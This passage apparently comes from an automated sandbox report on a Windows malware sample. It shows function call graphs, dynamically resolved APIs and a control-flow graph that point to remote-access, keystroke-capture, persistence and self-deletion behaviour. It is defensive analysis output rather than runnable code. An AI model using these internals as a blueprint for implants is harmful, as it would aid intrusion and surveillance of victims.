403b7a 47687->47693 47690 403cbb 47697 403dc2 47690->47697 47692 403cc9 47692->47166 47694 403b86 47693->47694 47695 403b9e 28 API calls 47694->47695 47696 403b5a 47695->47696 47696->47690 47698 403dce 47697->47698 47701 402ffd 47698->47701 47700 403de3 47700->47692 47702 40300e 47701->47702 47703 4032a4 28 API calls 47702->47703 47704 40301a 47703->47704 47706 40302e 47704->47706 47707 4035e8 28 API calls 47704->47707 47706->47700 47707->47706 47714 4395ca 47708->47714 47712 412814 47711->47712 47713 4127ed RegSetValueExA RegCloseKey 47711->47713 47712->47191 47713->47712 47717 43954b 47714->47717 47716 401608 47716->47189 47718 43955a 47717->47718 47719 43956e 47717->47719 47725 445364 20 API calls __dosmaperr 47718->47725 47724 43956a __alldvrm 47719->47724 47727 447611 11 API calls 2 library calls 47719->47727 47721 43955f 47726 43a837 26 API calls _Deallocate 47721->47726 47724->47716 47725->47721 47726->47724 47727->47724 47731 41aac9 ctype ___scrt_fastfail 47728->47731 47729 401f66 28 API calls 47730 41ab3e 47729->47730 47730->47195 47731->47729 47732->47211 47734 413fb3 getaddrinfo WSASetLastError 47733->47734 47735 413fa9 47733->47735 47734->47261 47871 413e37 35 API calls ___std_exception_copy 47735->47871 47737 413fae 47737->47734 47739 404206 socket 47738->47739 47740 4041fd 47738->47740 47742 404220 47739->47742 47743 404224 CreateEventW 47739->47743 47872 404262 WSAStartup 47740->47872 47742->47261 47743->47261 47744 404202 47744->47739 47744->47742 47746 4049b1 47745->47746 47747 40492a 47745->47747 47746->47261 47748 404933 47747->47748 47749 404987 CreateEventA CreateThread 47747->47749 47750 404942 GetLocalTime 47747->47750 47748->47749 47749->47746 47874 404b1d 47749->47874 47751 41ad56 28 API calls 47750->47751 47752 40495b 47751->47752 47873 404c9e 28 API calls 47752->47873 47754 404968 47755 401f66 28 API calls 47754->47755 47756 404977 47755->47756 47757 41a696 79 API calls 47756->47757 47758 40497c 47757->47758 47759 401eea 26 API calls 47758->47759 47759->47749 47761 4043e1 47760->47761 47762 4042b3 47760->47762 47763 4043e7 WSAGetLastError 47761->47763 47764 404343 47761->47764 47762->47764 47766 404cbf 28 API calls 47762->47766 47784 4042e8 47762->47784 47763->47764 47765 4043f7 47763->47765 47764->47261 47767 4043fc 47765->47767 47775 4042f7 47765->47775 47769 4042d4 47766->47769 47883 41bc86 30 API calls 47767->47883 47772 401f66 28 API calls 47769->47772 47771 4042f0 47774 404306 47771->47774 47771->47775 47778 4042e3 47772->47778 47773 40440b 47884 404c9e 28 API calls 47773->47884 47786 404315 47774->47786 47787 40434c 47774->47787 47776 401f66 28 API calls 47775->47776 47777 404448 47776->47777 47780 401f66 28 API calls 47777->47780 47781 41a696 79 API calls 47778->47781 47783 404457 47780->47783 47781->47784 47782 404418 47785 401f66 28 API calls 47782->47785 47788 41a696 79 API calls 47783->47788 47878 420161 27 API calls 47784->47878 47789 404427 47785->47789 47791 401f66 28 API calls 47786->47791 47880 420f44 56 API calls 47787->47880 47788->47764 47792 41a696 79 API calls 47789->47792 47794 404324 47791->47794 47796 40442c 47792->47796 47793 404354 47797 404389 47793->47797 47798 404359 47793->47798 47795 401f66 28 API calls 47794->47795 47799 404333 47795->47799 47801 401eea 26 API calls 47796->47801 47882 4202fa 28 API calls 47797->47882 47802 401f66 28 API calls 47798->47802 47803 41a696 79 API calls 47799->47803 47801->47764 47805 404368 47802->47805 47806 404338 47803->47806 47804 404391 47807 4043be CreateEventW CreateEventW 47804->47807 47809 401f66 28 API calls 47804->47809 47808 401f66 28 API calls 47805->47808 47879 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47806->47879 47807->47764 47810 404377 47808->47810 47812 4043a7 47809->47812 47813 41a696 79 API calls 47810->47813 47815 401f66 28 API calls 47812->47815 47814 40437c 47813->47814 47881 4205a2 54 API calls 47814->47881 47817 4043b6 47815->47817 47818 41a696 79 API calls 47817->47818 47819 4043bb 47818->47819 47819->47807 47885 41a955 GlobalMemoryStatusEx 47820->47885 47822 41a992 47822->47261 47886 413646 47823->47886 47827 40cc0d 47826->47827 47828 41246e 3 API calls 47827->47828 47829 40cc14 47828->47829 47830 4124b7 3 API calls 47829->47830 47831 40cc2c 47829->47831 47830->47831 47831->47261 47833 401f86 28 API calls 47832->47833 47834 41ae13 47833->47834 47834->47261 47836 41aee5 47835->47836 47837 401f86 28 API calls 47836->47837 47838 41aef7 47837->47838 47838->47261 47839->47277 47841 436060 ___scrt_fastfail 47840->47841 47842 41ac81 GetForegroundWindow GetWindowTextW 47841->47842 47843 403b40 28 API calls 47842->47843 47844 41acab 47843->47844 47844->47277 47846 401f66 28 API calls 47845->47846 47847 40e69e 47846->47847 47847->47277 47848->47277 47851 4045ec 47849->47851 47850 43a89c ___std_exception_copy 21 API calls 47850->47851 47851->47850 47853 40465b 47851->47853 47854 401f86 28 API calls 47851->47854 47856 401eef 26 API calls 47851->47856 47859 401eea 26 API calls 47851->47859 47927 404688 47851->47927 47938 40455b 59 API calls 47851->47938 47853->47851 47855 404666 47853->47855 47854->47851 47939 4047eb 98 API calls 47855->47939 47856->47851 47858 40466d 47860 401eea 26 API calls 47858->47860 47859->47851 47861 404676 47860->47861 47862 401eea 26 API calls 47861->47862 47863 40467f 47862->47863 47863->47238 47865->47261 47866->47238 47867->47238 47868->47277 47869->47238 47870->47238 47871->47737 47872->47744 47873->47754 47877 404b29 101 API calls 47874->47877 47876 404b26 47877->47876 47878->47771 47879->47764 47880->47793 47881->47806 47882->47804 47883->47773 47884->47782 47885->47822 47889 413619 47886->47889 47890 41362e ___scrt_initialize_default_local_stdio_options 47889->47890 47893 43e2ed 47890->47893 47896 43b040 47893->47896 47897 43b080 47896->47897 47898 43b068 47896->47898 47897->47898 47899 43b088 47897->47899 47920 445364 20 API calls __dosmaperr 47898->47920 47922 4392ee 38 API calls 3 library calls 47899->47922 47902 43b06d 47921 43a837 26 API calls _Deallocate 47902->47921 47904 43b098 47923 43b7c6 20 API calls 2 library calls 47904->47923 47907 41363c 47907->47261 47908 43b110 47924 43be34 50 API calls 3 library calls 47908->47924 47911 43b11b 47925 43b830 20 API calls _free 47911->47925 47912 43b078 47913 433d3c 47912->47913 47914 433d47 IsProcessorFeaturePresent 47913->47914 47915 433d45 47913->47915 47917 4341b4 47914->47917 47915->47907 47926 434178 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47917->47926 47919 434297 47919->47907 47920->47902 47921->47912 47922->47904 47923->47908 47924->47911 47925->47912 47926->47919 47928 4046a3 47927->47928 47929 4047d8 47928->47929 47932 403b60 28 API calls 47928->47932 47933 401eef 26 API calls 47928->47933 47934 401eea 26 API calls 47928->47934 47935 401ebd 28 API calls 47928->47935 47936 401fbd 28 API calls 47928->47936 47930 401eea 26 API calls 47929->47930 47931 4047e1 47930->47931 47931->47853 47932->47928 47933->47928 47934->47928 47937 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 47935->47937 47936->47928 47937->47928 47940 414b9b 47937->47940 47938->47851 47939->47858 47941 401fbd 28 API calls 47940->47941 47942 414bbd SetEvent 47941->47942 47943 414bd2 47942->47943 47944 403b60 28 API calls 47943->47944 47945 414bec 47944->47945 47946 401fbd 28 API calls 47945->47946 47947 414bfc 47946->47947 47948 401fbd 28 API calls 47947->47948 47949 414c0e 47948->47949 47950 41afd3 28 API calls 47949->47950 47951 414c17 47950->47951 47952 4161f2 47951->47952 47954 414de3 47951->47954 47955 414c37 GetTickCount 47951->47955 47953 401d8c 26 API calls 47952->47953 47956 4161fb 47953->47956 47954->47952 48014 414d99 47954->48014 47957 41ad56 28 API calls 47955->47957 47958 401eea 26 API calls 47956->47958 47959 414c4d 47957->47959 47961 416207 47958->47961 48019 41acb0 GetLastInputInfo GetTickCount 47959->48019 47964 401eea 26 API calls 47961->47964 47963 414d7d 47963->47952 47966 416213 47964->47966 47965 414c54 47967 41ad56 28 API calls 47965->47967 47968 414c5f 47967->47968 47969 41ac62 30 API calls 47968->47969 47970 414c6d 47969->47970 47971 41aed8 28 API calls 47970->47971 47972 414c7b 47971->47972 47973 401d64 28 API calls 47972->47973 47974 414c89 47973->47974 48020 4027ec 28 API calls 47974->48020 47976 414c97 48021 40275c 28 API calls 47976->48021 47978 414ca6 47979 4027cb 28 API calls 47978->47979 47980 414cb5 47979->47980 48022 40275c 28 API calls 47980->48022 47982 414cc4 47983 4027cb 28 API calls 47982->47983 47984 414cd0 47983->47984 48023 40275c 28 API calls 47984->48023 47986 414cda 48024 404468 60 API calls ctype 47986->48024 47988 414ce9 47989 401eea 26 API calls 47988->47989 47990 414cf2 47989->47990 47991 401eea 26 API calls 47990->47991 47992 414cfe 47991->47992 47993 401eea 26 API calls 47992->47993 47994 414d0a 47993->47994 47995 401eea 26 API calls 47994->47995 47996 414d16 47995->47996 47997 401eea 26 API calls 47996->47997 47998 414d22 47997->47998 47999 401eea 26 API calls 47998->47999 48000 414d2e 47999->48000 48001 401e13 26 API calls 48000->48001 48002 414d3a 48001->48002 48003 401eea 26 API calls 48002->48003 48004 414d43 48003->48004 48005 401eea 26 API calls 48004->48005 48006 414d4c 48005->48006 48007 401d64 28 API calls 48006->48007 48008 414d57 48007->48008 48009 43a5f7 _strftime 42 API calls 48008->48009 48010 414d64 48009->48010 48011 414d69 48010->48011 48012 414d8f 48010->48012 48015 414d82 48011->48015 48016 414d77 48011->48016 48013 401d64 28 API calls 48012->48013 48013->48014 48014->47952 48026 404ab1 83 API calls 48014->48026 48017 404915 104 API calls 48015->48017 48025 4049ba 81 API calls 48016->48025 48017->47963 48019->47965 48020->47976 48021->47978 48022->47982 48023->47986 48024->47988 48025->47963 48026->47963 48028->47309 48029->47336 48030->47335 48031->47324 48032->47328 48033->47334 48039 40e56a 48034->48039 48035 4124b7 3 API calls 48035->48039 48036 4082dc 28 API calls 48055 40e5a1 48036->48055 48037 40e60e 48038 4082dc 28 API calls 48037->48038 48042 40e619 48038->48042 48039->48035 48039->48037 48040 40e5fe Sleep 48039->48040 48039->48055 48067 40bf04 48039->48067 48040->48039 48041 41ae18 28 API calls 48041->48055 48044 41ae18 28 API calls 48042->48044 48045 40e625 48044->48045 48155 412774 29 API calls 48045->48155 48048 401e13 26 API calls 48048->48055 48049 40e638 48050 401e13 26 API calls 48049->48050 48052 40e644 48050->48052 48051 401f66 28 API calls 48051->48055 48053 401f66 28 API calls 48052->48053 48054 40e655 48053->48054 48057 4126d2 29 API calls 48054->48057 48055->48036 48055->48040 48055->48041 48055->48048 48055->48051 48056 4126d2 29 API calls 48055->48056 48154 412774 29 API calls 48055->48154 48056->48055 48058 40e668 48057->48058 48156 411699 TerminateProcess WaitForSingleObject 48058->48156 48060 40e670 ExitProcess 48222 411637 61 API calls 48066->48222 48157 411699 TerminateProcess WaitForSingleObject 48067->48157 48069 40bf13 48070 40bf26 48069->48070 48158 40afba TerminateThread 48069->48158 48071 40bf36 48070->48071 48179 418c18 9 API calls 48070->48179 48074 40bf3f 48071->48074 48076 40bf50 48071->48076 48180 41b43f 9 API calls 48074->48180 48077 40bf76 48076->48077 48078 41297a 2 API calls 48076->48078 48079 41297a 2 API calls 48077->48079 48080 40bf95 48077->48080 48078->48077 48079->48080 48081 41297a 2 API calls 48080->48081 48082 40bfb2 ___scrt_fastfail 48080->48082 48081->48082 48083 41265d 3 API calls 48082->48083 48084 40c002 48083->48084 48085 40c019 48084->48085 48086 40c009 GetModuleFileNameW 48084->48086 48087 40c020 RegDeleteKeyA 48085->48087 48086->48085 48088 40c03f 48087->48088 48089 40c058 SetFileAttributesW 48088->48089 48090 40c049 48088->48090 48165 41ab48 48089->48165 48093 40c055 SetFileAttributesW 48090->48093 48093->48089 48094 41ae18 28 API calls 48095 40c086 48094->48095 48096 4028cf 28 API calls 48095->48096 48097 40c094 48096->48097 48098 401e13 26 API calls 48097->48098 48099 40c09e 48098->48099 48100 401eea 26 API calls 48099->48100 48101 40c0a7 48100->48101 48102 403b40 28 API calls 48101->48102 48103 40c0c9 48102->48103 48104 4028cf 28 API calls 48103->48104 48105 40c0d4 48104->48105 48176 403cdc 48105->48176 48107 40c0e0 48108 401e13 26 API calls 48107->48108 48109 40c0ea 48108->48109 48110 401e13 26 API calls 48109->48110 48111 40c0f3 48110->48111 48112 403b40 28 API calls 48111->48112 48113 40c101 48112->48113 48114 403cbb 28 API calls 48113->48114 48115 40c110 48114->48115 48116 401e13 26 API calls 48115->48116 48117 40c11a 48116->48117 48118 40c176 48117->48118 48120 403b40 28 API calls 48117->48120 48119 403b40 28 API calls 48118->48119 48121 40c191 48119->48121 48122 40c135 48120->48122 48123 4028cf 28 API calls 48121->48123 48124 403cbb 28 API calls 48122->48124 48125 40c19c 48123->48125 48126 40c144 48124->48126 48128 4028cf 28 API calls 48125->48128 48127 4028cf 28 API calls 48126->48127 48129 40c150 48127->48129 48130 40c1a8 48128->48130 48132 401e13 26 API calls 48129->48132 48131 401e13 26 API calls 48130->48131 48133 40c1bc 48131->48133 48134 40c164 48132->48134 48135 401e13 26 API calls 48133->48135 48136 401e13 26 API calls 48134->48136 48137 40c1c5 48135->48137 48138 40c16d 48136->48138 48139 401e13 26 API calls 48137->48139 48140 401e13 26 API calls 48138->48140 48141 40c1ce 48139->48141 48140->48118 48146 40c22f 48141->48146 48181 40b0dd 28 API calls 48141->48181 48143 40c206 48144 4028cf 28 API calls 48143->48144 48145 40c212 48144->48145 48147 401e13 26 API calls 48145->48147 48149 41b59f 4 API calls 48146->48149 48148 40c226 48147->48148 48150 401e13 26 API calls 48148->48150 48151 40c267 48149->48151 48150->48146 48152 40c286 ExitProcess 48151->48152 48153 40c279 ShellExecuteW 48151->48153 48153->48152 48154->48055 48155->48049 48156->48060 48157->48069 48159 40afd3 UnhookWindowsHookEx TerminateThread 48158->48159 48160 40af77 48158->48160 48159->48160 48161 40af83 DeleteFileW 48160->48161 48163 40af9f 48161->48163 48162 40afb5 48162->48070 48163->48162 48164 40afae RemoveDirectoryW 48163->48164 48164->48162 48166 41ab58 48165->48166 48182 41a46a 48166->48182 48172 40c07b 48172->48094 48173 440a2a 38 API calls 48174 41ab8f 48173->48174 48174->48172 48174->48173 48191 41c198 28 API calls 48174->48191 48218 402daf 48176->48218 48178 403cea 48178->48107 48179->48071 48180->48076 48181->48143 48183 4395ca 27 API calls 48182->48183 48184 41a471 GetCurrentProcessId 48183->48184 48185 440a4b 48184->48185 48192 446ecf GetLastError 48185->48192 48187 41ab83 48188 440a2a 48187->48188 48189 446ecf pre_c_initialization 38 API calls 48188->48189 48190 440a2f 48189->48190 48190->48174 48191->48174 48193 446ee5 48192->48193 48194 446ef1 48192->48194 48213 447476 11 API calls 2 library calls 48193->48213 48214 448716 20 API calls 3 library calls 48194->48214 48197 446eeb 48197->48194 48199 446f3a SetLastError 48197->48199 48198 446efd 48200 446f05 48198->48200 48215 4474cc 11 API calls 2 library calls 48198->48215 48199->48187 48202 446ad5 _free 20 API calls 48200->48202 48204 446f0b 48202->48204 48203 446f1a 48203->48200 48205 446f21 48203->48205 48207 446f46 SetLastError 48204->48207 48216 446d41 20 API calls pre_c_initialization 48205->48216 48217 4453c6 38 API calls _Atexit 48207->48217 48208 446f2c 48210 446ad5 _free 20 API calls 48208->48210 48212 446f33 48210->48212 48212->48199 48212->48207 48213->48197 48214->48198 48215->48203 48216->48208 48219 402dbb 48218->48219 48220 4030f7 28 API calls 48219->48220 48221 402dcd 48220->48221 48221->48178

                                        Executed Functions

                                        Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleLibraryLoadModule
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                        • API String ID: 384173800-625181639
                                        • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                        • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                        • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                        • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
                                        Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 93 40d9c0-40d9cc call 41a473 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->127 128 40da2d call 4069ba 107->128 117 40d9e0-40d9e2 108->117 121 40d9e4-40d9e9 call 40699d call 4064d0 117->121 122 40d9ee-40da01 call 401d64 call 401e8f 117->122 121->122 122->107 138 40da03-40da09 122->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 127->164 128->127 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338d8 168->178 169->178 196 40dbf3 178->196 197 40dbe6-40dbf1 call 436060 178->197 188->163 202 40dbf5-40dc40 call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 196->202 197->202 257 40dc45-40dc6a call 4338e1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41bec0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 280->331 292->92 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 354->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 414 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                        APIs
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
